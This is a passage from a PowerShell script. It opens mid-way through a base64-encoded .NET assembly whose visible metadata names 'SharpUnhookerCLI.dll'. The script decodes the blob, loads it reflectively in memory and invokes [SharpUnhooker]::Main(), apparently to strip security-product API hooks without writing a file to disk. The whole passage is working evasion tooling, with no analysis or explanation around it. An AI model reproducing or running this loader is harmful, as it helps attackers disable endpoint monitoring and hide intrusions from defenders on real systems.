QAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsATMAQAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAACoAQAAAQAwADAAMAAwADAANABiADAAAAAsAAIAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAAIAAAADAACAABAEYAaQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAAMAAuADAALgAwAC4AMAAAAEwAFQABAEkAbgB0AGUAcgBuAGEAbABOAGEAbQBlAAAAUwBoAGEAcgBwAFUAbgBoAG8AbwBrAGUAcgBDAEwASQAuAGQAbABsAAAAAAAoAAIAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAAAgAAAAVAAVAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAFMAaABhAHIAcABVAG4AaABvAG8AawBlAHIAQwBMAEkALgBkAGwAbAAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgAAAMAAAAcDsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'

$binary = [Convert]::FromBase64String($b64)
$ref = [System.Reflection.Assembly]::Load($binary)
[SharpUnhooker]::Main()